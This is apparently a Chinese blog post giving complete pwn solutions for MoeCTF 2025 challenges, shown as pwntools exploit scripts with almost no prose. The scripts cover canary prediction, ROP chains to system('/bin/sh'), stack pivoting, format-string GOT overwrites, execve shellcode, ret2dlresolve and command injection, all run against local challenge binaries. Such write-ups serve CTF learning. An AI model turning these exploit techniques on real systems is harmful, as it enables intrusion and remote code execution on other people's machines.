0x00 粗糙地贴一份moectf2025以及newstarctf2025(至week3) pwn方向的全解。笔者已经不是新生,贴全题解也不是为了享受炸鱼快感。原本不打算发布,只是因为一些事,有一些感慨,所以发布此题解,仅仅希望能帮助到正在看的你,也权且算是笔者投身 pwn 的一次回望。 0x01 - 0x16 为 moectf2025题解,0x17及以后为 newstarctf2025 week3前的题解
0x01 boom 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 from pwn import *import ctypescontext(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 50188 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() clib = ctypes.CDLL("/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" ) clib.srand(clib.time(0 )) canary = clib.random() % 114514 backdoor = 0x40127e io.recvuntil(b'(y/n)' ) io.sendline(b'y' ) io.recvuntil(b'message:' ) payload = b'\x00' *0x7c + p32(canary) + b'\x00' *0x10 + p64(0xdeadbeef ) + p64(backdoor) io.sendline(payload) io.interactive()
0x02 boom_revenge 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 from pwn import *import ctypescontext(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 54984 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) clib = ctypes.CDLL("/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" ) io = start() seed = clib.time(0 ) + 1 clib.srand(seed) canary = clib.random() % 114514 log.info("canary --> " +hex (canary)) backdoor = 0x40127e io.recvuntil(b'(y/n)' ) io.sendline(b'y' ) io.recvuntil(b'message:' ) payload = b'\x00' *0x7c + p32(canary) + b'\x00' *0x10 + p64(0xdeadbeef ) + p64(backdoor) io.sendline(payload) io.interactive()
0x03 call_it 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 60044 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() menu = b'Choose your gesture: ' for _ in range (5 ): io.recvuntil(menu) io.sendline(b'3' ) io.recvuntil(b'?' ) io.sendline(b'/bin/sh\x00' ) gift = 0x401235 call_system = 0x401228 binsh = 0x404060 for _ in range (3 ): io.recvuntil(menu) io.sendline(b'6' ) io.recvuntil(menu) io.sendline(b'3' ) io.recvuntil(b'?' ) io.sendline(p64(gift) + b'\x60\x40\x40\x00\x00\x00\x00' ) io.recvuntil(menu) io.sendline(b'3' ) io.recvuntil(b'?' ) io.sendline(p64(call_system)) io.interactive()
0x04 ez_u64 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 55998 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() io.recvuntil(b'hint.' ) leak_data=u64(io.recv(8 )) num=int (leak_data) io.sendline(str (num)) io.interactive()
0x05 ezlibc 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 58058 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() io.recvuntil(b'0x' ) read_plt_addr=int (io.recv(12 ),16 ) log.success(hex (read_plt_addr)) elf_base=read_plt_addr-0x1060 log.success(hex (elf_base)) main_addr=elf_base+0x11ce ret=elf_base+0x101a payload=b'a' *0x20 +p64(read_plt_addr)+p64(ret)+p64(main_addr) io.send(payload) io.recvuntil(b'0x' ) read_addr=int (io.recv(12 ),16 ) log.success(hex (read_addr)) libc_base=read_addr-libc.sym['read' ] log.success(hex (libc_base)) pop_rdi_ret=libc_base+0x2a3e5 ret=pop_rdi_ret+1 binsh=libc_base+next (libc.search('/bin/sh' )) sys=libc_base+libc.sym['system' ] payload=b'a' *0x28 +p64(ret)+p64(pop_rdi_ret)+p64(binsh)+p64(sys) io.send(payload) io.interactive()
0x06 ezpivot 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 62363 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() system = elf.plt['system' ] pop_rdi_ret = 0x401219 ret = 0x401219 + 1 leave_ret = 0x40120f bss = 0x404060 payload = b'/bin/sh\x00' *0x100 + p64(bss) + p64(ret) + p64(pop_rdi_ret) + p64(bss) + p64(system) io.recvuntil(b'introduction.' ) io.sendline(b'-1' ) io.send(payload) payload = b'a' *0xc + p64(bss + 0x800 ) + p64(leave_ret) io.recvuntil(b'number:' ) io.send(payload) io.interactive()
0x07 ezprotection 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 64058 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() orw_low = 0x128c payload = b'a' *0x18 + b'b' io.send(payload) io.recvuntil(b'aab' ) canary = u64(io.recv(7 ).rjust(0x8 , b'\x00' )) log.success("canary --> " +hex (canary)) rbp = u64(io.recv(6 ).ljust(0x8 , b'\x00' )) log.success("rbp --> " +hex (rbp)) io.recvuntil(b'bytes.' ) payload = b'a' *0x18 + p64(canary) + p64(rbp) + b'\x8c' + b'\x72' io.send(payload) io.interactive()
0x08 ezshellcode 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 62001 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() shellcode = asm(''' xor rsi, rsi push rsi mov rdi, 0x68732f2f6e69622f push rdi push rsp pop rdi mov al, 59 cdq syscall ''' )io.sendline(b'4' ) io.recvuntil(b'set.\n' ) io.send(shellcode) io.interactive()
0x09 eztext 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6_2.35-0ubuntu3_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 65306 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6-dbg_2.35-0ubuntu3_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/glibc-source_2.35-0ubuntu3_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() sys_addr=0x4011cd ret=0x40101a io.recvuntil(b'?' ) io.sendline(b'100' ) payload=b'a' *0x10 +p64(sys_addr) io.sendline(payload) io.interactive()
0x0a find_it 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 53309 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() io.recvuntil(b'it?\n' ) io.sendline(b'3' ) io.recvuntil(b'see?\n' ) io.sendline(b'flag' ) io.recvuntil(b'fd?\n' ) io.sendline(b'1' ) io.interactive()
0x0b fmt 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.39-0ubuntu8/amd64/libc6_2.39-0ubuntu8_amd64/usr/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 59478 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.39-0ubuntu8/amd64/libc6-dbg_2.39-0ubuntu8_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.39-0ubuntu8/amd64/glibc-source_2.39-0ubuntu8_all/usr/src/glibc/glibc-2.39 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() io.recvuntil(b'name?' ) payload=b'%7$s%10$p' io.sendline(payload) io.recvuntil(b'Nice to meet you,' ) str2=io.recv(5 ) log.success(str2) io.recvuntil(b'0x' ) hex_str=io.recv(10 ) str1=bytes .fromhex(hex_str.decode()).decode('ascii' ) log.success(str1) io.interactive()
0x0c fmt_S 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/libc6_2.35-0ubuntu3.8_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 56167 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/libc6-dbg_2.35-0ubuntu3.8_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/glibc-source_2.35-0ubuntu3.8_all/usr/src/glibc/glibc-2.35 b talk ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() payload=b'%8$p%33$p' io.recvuntil(b'him...' ) io.sendline(payload) io.recvuntil(b'0x' ) stack_addr=int (io.recv(12 ),16 ) ret_addr=stack_addr-0x18 +0x20 i_addr=ret_addr+0x10 -0x20 log.success("ret_addr in stack-->" +hex (ret_addr)) log.success("i_addr in stack-->" +hex (i_addr)) io.recvuntil(b'0x' ) libc_start_main=int (io.recv(12 ),16 )-128 libc_base=libc_start_main-libc.sym['__libc_start_main' ] log.success("libc_base-->" +hex (libc_base)) io.recvuntil(b'battle!' ) io.send(p64(0 )) payload='%{}c' .format ((i_addr & 0xffff ) + 7 ).encode() + b"%17$hn" io.recvuntil(b'him...' ) io.send(payload) io.recvuntil(b'battle!' ) io.send(p64(0 )) payload='%{}c' .format (0xff ).encode() + b"%47$hhn" io.recvuntil(b'him...' ) io.send(payload) io.recvuntil(b'battle!' ) io.send(p64(0 )) payload='%{}c' .format (ret_addr & 0xffff ).encode() + b"%17$hn" io.recvuntil(b'him...' ) io.send(payload) io.recvuntil(b'battle!' ) io.send(p64(0 )) backdoor=libc_base+0xebd3f payload='%{}c' .format (backdoor & 0xffff ).encode() + b"%47$hn" io.recvuntil(b'him...' ) io.send(payload) io.recvuntil(b'battle!' ) io.send(p64(0 )) payload='%{}c' .format ((ret_addr & 0xffff ) + 2 ).encode() + b"%17$hn" io.recvuntil(b'him...' ) io.send(payload) io.recvuntil(b'battle!' ) io.send(p64(0 )) payload='%{}c' .format ((backdoor >> 16 ) & 0xffff ).encode() + b"%47$hn" io.recvuntil(b'him...' ) io.send(payload) io.recvuntil(b'battle!' ) io.send(p64(0 )) rbp_addr=ret_addr-0x8 payload='%{}c' .format (rbp_addr & 0xffff ).encode() + b"%17$hn" io.recvuntil(b'him...' ) io.send(payload) io.recvuntil(b'battle!' ) io.send(p64(0 )) rbp=ret_addr+0x80 -0x8 payload='%{}c' .format (rbp & 0xffff ).encode() + b"%47$hn" io.recvuntil(b'him...' ) io.send(payload) io.recvuntil(b'battle!' ) io.send(p64(0 )) payload='%{}c' .format ((rbp_addr & 0xffff ) + 2 ).encode() + b"%17$hn" io.recvuntil(b'him...' ) io.send(payload) io.recvuntil(b'battle!' ) io.send(p64(0 )) payload='%{}c' .format ((rbp >> 16 ) & 0xffff ).encode() + b"%47$hn" io.recvuntil(b'him...' ) io.send(payload) io.recvuntil(b'battle!' ) io.send(p64(0 )) payload='%{}c' .format ((rbp_addr & 0xffff ) + 4 ).encode() + b"%17$hn" io.recvuntil(b'him...' ) io.send(payload) io.recvuntil(b'battle!' ) io.send(p64(0 )) payload='%{}c' .format ((rbp >> 32 ) & 0xffff ).encode() + b"%47$hn" io.recvuntil(b'him...' ) io.send(payload) io.recvuntil(b'battle!' ) io.sendline(b'0' ) io.interactive()
0x0d fmt_T 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/libc6_2.35-0ubuntu3.8_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 60002 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/libc6-dbg_2.35-0ubuntu3.8_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.8/amd64/glibc-source_2.35-0ubuntu3.8_all/usr/src/glibc/glibc-2.35 b printf ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() payload = b'%11$p' io.send(payload) io.recvuntil(b'0x' ) libc_base = int (io.recv(12 ), 16 ) + 0x30 - libc.sym['__libc_start_main' ] log.success("libc_base --> " +hex (libc_base)) system = libc_base + libc.sym['system' ] target_got = elf.got['printf' ] log.info("target addr --> " +hex (target_got)) log.info("printf addr --> " +hex (libc_base+libc.sym['printf' ])) log.info("system addr --> " +hex (system)) payload = b'%;sh' io.recvuntil(b'hell.\n' ) io.send(payload) payload = p64(target_got) + b'\x1a\x40\x40\x00\x00\x00\x00' io.recvuntil(b'hell.\n' ) io.send(payload) val1 = (system & 0xffff ) val2 = ((system >> 16 ) & 0xffff ) - val1 + 0x10000 payload = '%{}c' .format (val1).encode() + b"%24$hn" + '%{}c' .format (val2).encode() + b"%25$hn" io.recvuntil(b'hell.\n' ) io.send(payload.ljust(26 )) io.interactive()
0x0e hardpivot 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 64689 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 b vuln ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() pop_rdi_ret = 0x40119e ret = 0x40101a leave_ret = 0x40127b main = 0x40127d vuln = 0x401264 bss = 0x404060 io.recvuntil(b'> ' ) payload = b'a' *0x40 + p64(bss + 0x1000 ) + p64(vuln) io.send(payload) puts_got = elf.got['puts' ] puts_plt = elf.plt['puts' ] payload = p64(bss + 0x800 ) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(vuln) + b'a' *0x18 + p64(bss + 0x1000 - 0x40 ) + p64(leave_ret) io.send(payload) puts_addr = u64(io.recv(6 ).ljust(8 , b'\x00' )) log.success("puts_addr --> " +hex (puts_addr)) libc_base = puts_addr - libc.sym['puts' ] log.success("libc_base --> " +hex (libc_base)) system = libc_base + libc.sym['system' ] binsh = bss + 0x800 - 0x8 payload = p64(bss + 0x400 ) + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(system) + b'/bin/sh\x00' *3 + p64(bss + 0x800 - 0x40 ) + p64(leave_ret) io.send(payload) io.interactive()
0x0f inject 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 52758 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() payload = b'\n' + b'cat flag -- ' io.sendline(b'4' ) io.send(payload) io.interactive()
0x10 no_way_to_leak 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.31-0ubuntu9.18/amd64/libc6_2.31-0ubuntu9.18_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 57889 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b vuln set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.31-0ubuntu9.18/amd64/libc6-dbg_2.31-0ubuntu9.18_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.31-0ubuntu9.18/amd64/glibc-source_2.31-0ubuntu9.18_all/usr/src/glibc/glibc-2.31 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() offset = 0x78 read_length = 0x100 rop = ROP(elf) dlresolve = Ret2dlresolvePayload(elf, symbol='system' , args=["/bin/sh" ]) rop.read(0 , dlresolve.data_addr) rop.ret2dlresolve(dlresolve) raw_rop = rop.chain() payload = flat({offset:raw_rop, read_length:dlresolve.payload}) io.send(payload) log.info(rop.dump()) io.interactive()
0x11 prelibc 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 from pwn import * context (os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 54127 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35 -0u buntu3.10 /amd64/libc6-dbg_2.35 -0u buntu3.10 _amd64/usr/lib/debugset directories /home/r3t2/.config/cpwn/pkgs/2.35 -0u buntu3.10 /amd64/glibc-source_2.35 -0u buntu3.10 _all/usr/src/glibc/glibc-2.35 ''' def start(): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() # Your exploit here io.recvuntil(b'0x' ) leak_addr = int (io.recv(12 ), 16 ) libc_base = leak_addr - libc.sym['printf' ] log .info("libc_base --> " +hex(libc_base))system = libc_base + libc.sym['system' ] binsh = libc_base + next(libc.search(b"/bin/sh" )) pop_rdi_ret = libc_base + 0x2a3e5 ret = pop_rdi_ret + 1 payload = b'a' *0x48 + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(system) io.recvuntil(b'> ' ) io.send(payload.ljust(0x100 , b'\x00' )) io.interactive()
0x12 randomlock 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 from pwn import *import ctypescontext(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 54327 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) clib=ctypes.CDLL("/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" ) for i in range (100 ): io = start() io.recvuntil(b'me?' ) clib.srand(i) for j in range (10 ): io.recvuntil(b'>' ) val=clib.rand() % 10000 ; io.sendline(str (val)) res=io.recvline() if b"Incorrect password." in res: break break io.interactive()
